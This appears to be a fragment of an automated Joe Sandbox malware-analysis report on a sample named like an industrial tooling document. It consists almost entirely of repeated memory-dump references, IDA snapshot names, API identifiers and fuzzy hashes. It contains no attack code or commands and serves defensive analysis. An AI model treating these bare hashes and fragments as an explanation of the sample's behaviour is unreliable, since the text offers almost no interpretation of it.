                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00420D28,?,?,?,00409014,?,00420D28,?,?,766B3410,0042A400,00000000), ref: 00405648
                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004056F5
                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405706
Memory Dump Source
• Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                          • String ID: (B$\*.*
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: .5rr$4;5$4;5
                                                                                                                                                                                                                          • API String ID: 0-3835424248
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972950864.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38ca0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972950864.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38ca0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa5e09f71ec8bb2f34ff8bb96a73b312d5f360df0cd4da7663f80f215368b8ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBD1C074E003188FDB54DFA5C991B9DBBB2BF89300F1081A9D408AB365DB359E85CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d785ed2982af9aec4f877a4aba085ea53bdab51c102861869a79dd9d46ccbb6f
                                                                                                                                                                                                                          • Instruction ID: b402b4d9cd0a952b74cce25d824a69ed29fd5682377888698f4953399d6575c3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d785ed2982af9aec4f877a4aba085ea53bdab51c102861869a79dd9d46ccbb6f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81D1C074E003188FDB54DFA5C955B9DBBB2BF89300F1081A9D408AB3A5DB359E85CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c7c3c6ca9a5402c68920cca0377a6e11f23bf12835bd95dcf7628e48b7e92354
                                                                                                                                                                                                                          • Instruction ID: 00c1906baa4dcfb77ac513f22a5b3db378d00b36b10e544f0b212fe104572958
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7c3c6ca9a5402c68920cca0377a6e11f23bf12835bd95dcf7628e48b7e92354
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40D1C074E003188FDB54DFA9C991B9DBBB2BF89300F2081A9D408AB365DB359E85CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: bbf3bbf0c9f18580f3d9e8fc54060f12e13eb00e55d8b3e47d4d2cc37a2ec46d
                                                                                                                                                                                                                          • Instruction ID: 6fac07f99fe4634a4104dd058f18aeae3b79b97c8bf82ae587d7ef311770eb0b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbf3bbf0c9f18580f3d9e8fc54060f12e13eb00e55d8b3e47d4d2cc37a2ec46d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3D1C174E003288FDB54DFA9C991B9DBBB2BF89300F1081A9D408AB365DB359E85CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 0d6ca3e6074f7287895ffc18f8ad1d7f8087366f5bd44fb8bdaf697fff794722
                                                                                                                                                                                                                          • Instruction ID: f61ccc788d37dd459f4ec6972bae1e63f7da65c3ccd79f96ec96a4fae781e21a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d6ca3e6074f7287895ffc18f8ad1d7f8087366f5bd44fb8bdaf697fff794722
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7D1B074E003188FDB54DFA9C991B9DBBB2BF89300F6081A9D408AB365DB359E85CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 81d22b55468790f9fccf0c05db2e9822d004294747995f241cdddd352378127a
                                                                                                                                                                                                                          • Instruction ID: c2fe8cb4fbf63255a92e53e6dd12ef72dcd051a127e487bbff4d4106ea86b863
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81d22b55468790f9fccf0c05db2e9822d004294747995f241cdddd352378127a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07D1BF74E002188FDB54DFA9C991B9DBBF2BF89300F5081A9D408AB3A5DB359E85CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f5afec7e07d89e20da7ed0ad03353df2cbc39ac78c635e74053eafe88221ae6e
                                                                                                                                                                                                                          • Instruction ID: 5bd8ed0bbce960333860f8d30a3c8b50affa995183fb023ad825a78af44aec60
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5afec7e07d89e20da7ed0ad03353df2cbc39ac78c635e74053eafe88221ae6e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69D1C174E003188FDB54DFA5C991B9DBBB2BF89300F6081A9D408AB365DB359E86CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ef6c3ccf595df7a203d1301fbbafedb8b84e227a574bd9536c7a4ce4332a55b7
                                                                                                                                                                                                                          • Instruction ID: 38dca5735cf5f1760292c8cc136d5e72ac5be54848d23186f76cda6d8c0bbb94
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef6c3ccf595df7a203d1301fbbafedb8b84e227a574bd9536c7a4ce4332a55b7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31D1BF78E012188FDB54DFA9C991B9DBBB2FF89300F5081A9D408AB365DB359E85CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 650c4b0de25100be682bea09a12e23d4f8a052bbe85673a6844b4e3f8a5f8ac4
                                                                                                                                                                                                                          • Instruction ID: a34e34791e273bcecf0d532d04bb137c3024fdbab641b63c3e7926e6493eab66
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 650c4b0de25100be682bea09a12e23d4f8a052bbe85673a6844b4e3f8a5f8ac4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5D1D074E003188FDB54DFA5C995B9DBBB2BF89300F2081A9D408AB365DB359E85CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f1985250e8a6cc0ffd7b564e5fdd767961fa4e753ad7d3ffe3e219065ca8b82f
                                                                                                                                                                                                                          • Instruction ID: 23d9353f1581d655c6d0811cd4520593d006b26a1ec974d4674c88232f830e2a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1985250e8a6cc0ffd7b564e5fdd767961fa4e753ad7d3ffe3e219065ca8b82f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7ED1D174E013288FDB54DFA9C991B9DBBB2BF89300F2081A9D408AB364DB355E85CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: cc538550aa6dcbb165162bd2a837135baaefa353e235f8b31e0a911f6f669c98
                                                                                                                                                                                                                          • Instruction ID: dba5d84a5bea6a2295bbc3b41775fbbd8d6a0cfd13f69042ec132736ced14f4b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc538550aa6dcbb165162bd2a837135baaefa353e235f8b31e0a911f6f669c98
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AD1BE78E002188FDB55DFA5C954B9DBBB2FF89300F2081A9D848AB364DB355E86CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: bfeac7f222f05b3c6b339b732614f302ab982d2954c12ef9679028ac3912f2b7
                                                                                                                                                                                                                          • Instruction ID: 6fa1c1002b4b84065bb53095683409eb960db09c6e74890271775f997dc25df2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfeac7f222f05b3c6b339b732614f302ab982d2954c12ef9679028ac3912f2b7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AD1BF78E00218CFDB55DFA5C950B9DBBB2FF89300F2081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: cd98689d9d1530c43578e76dc33c7fe5868c05fe0cc051375ba49ecef8af7fff
                                                                                                                                                                                                                          • Instruction ID: 89248891b3c086696f3774f66996749492cbd874849637f5184445b70a642e9c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd98689d9d1530c43578e76dc33c7fe5868c05fe0cc051375ba49ecef8af7fff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52D1B078E00218CFDB55DFA5C954B9DBBB2FF89300F2081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 535ad890a448fe026647f118afd7bfebe6e93588b9ea638f96bb2a7d0e705fbf
                                                                                                                                                                                                                          • Instruction ID: 7fa96e790ba3d88a8fa723f947a2dbf97be018108d699a7110deb88c90a15ed9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 535ad890a448fe026647f118afd7bfebe6e93588b9ea638f96bb2a7d0e705fbf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1D1B178E00218CFDB55DFA5C950B9DBBB2FF89300F2081A9D849AB364DB355A86CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 705ffa38c0e63184b9d8f4a0149c0ea9b5e5f3deafcdcd1d4958ce83943821be
                                                                                                                                                                                                                          • Instruction ID: 90c1da89935ba26afaa1bda5ed26eef8e9d8643eaab500cf33a864d26b2effbb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 705ffa38c0e63184b9d8f4a0149c0ea9b5e5f3deafcdcd1d4958ce83943821be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BD1BF78E00218CFDB55DFA5C950B9DBBB2FF89300F2081A9D848AB365DB355A86CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 393ee4281627bbd91557a7dc440e9b5ef1cc3d1dfbb83dbaa0845b3f62df938f
                                                                                                                                                                                                                          • Instruction ID: 3dedbd40a0348d26833770172d969165dc0947b158bee39a79a8b95e68f73dba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 393ee4281627bbd91557a7dc440e9b5ef1cc3d1dfbb83dbaa0845b3f62df938f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AD1B178E00218CFDB55DFA5C950B9DBBB2FF89300F6081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 11695423d5bf904305575f96584be7bbf322fef0735a0a99d7aff0f19d6d109d
                                                                                                                                                                                                                          • Instruction ID: c6a374f38289fa67780f80ad9ab7c8c4d836a66c5ad445d3583e4eaad25ed568
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11695423d5bf904305575f96584be7bbf322fef0735a0a99d7aff0f19d6d109d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4D1C178E002188FDB55DFA5C940B9DBBB2FF89300F1081A9D448AB365DB355E86CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: efc73333e5ac312e49c2ed6c71b8d2012f142adff58872eccabf7def03fcbb4a
                                                                                                                                                                                                                          • Instruction ID: 1d396f02e9f1851f30af92bc3f933908217c6fe5c41e18d8eccdaf27b19f871b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efc73333e5ac312e49c2ed6c71b8d2012f142adff58872eccabf7def03fcbb4a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38D1A078E003188FDB55DFA5C950B9DBBB2FF89300F6081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d3f73d561b401d631d5916af1004e32d658882ae0ae4eadc56587d2c68a90f18
                                                                                                                                                                                                                          • Instruction ID: 694ebd69ff18b0a5d3956972ccc09bd6fe74f9a192b073ec07a81b329d13826a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3f73d561b401d631d5916af1004e32d658882ae0ae4eadc56587d2c68a90f18
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7ED1AF78E00218CFDB55DFA5C950B9DBBB2FF89300F6081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d5eb20503f88b7558851b4605356d6bd1bdde6606f4580473394cafd443ca951
                                                                                                                                                                                                                          • Instruction ID: ab33e89798383ca3873c15a147c687aa2ff3794ee9ccf9dd3cc52c667e6af0a0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5eb20503f88b7558851b4605356d6bd1bdde6606f4580473394cafd443ca951
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94D1A178E01218CFDB55DFA5C950B9DBBB2FF89300F1081A9D848AB364DB356A86CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
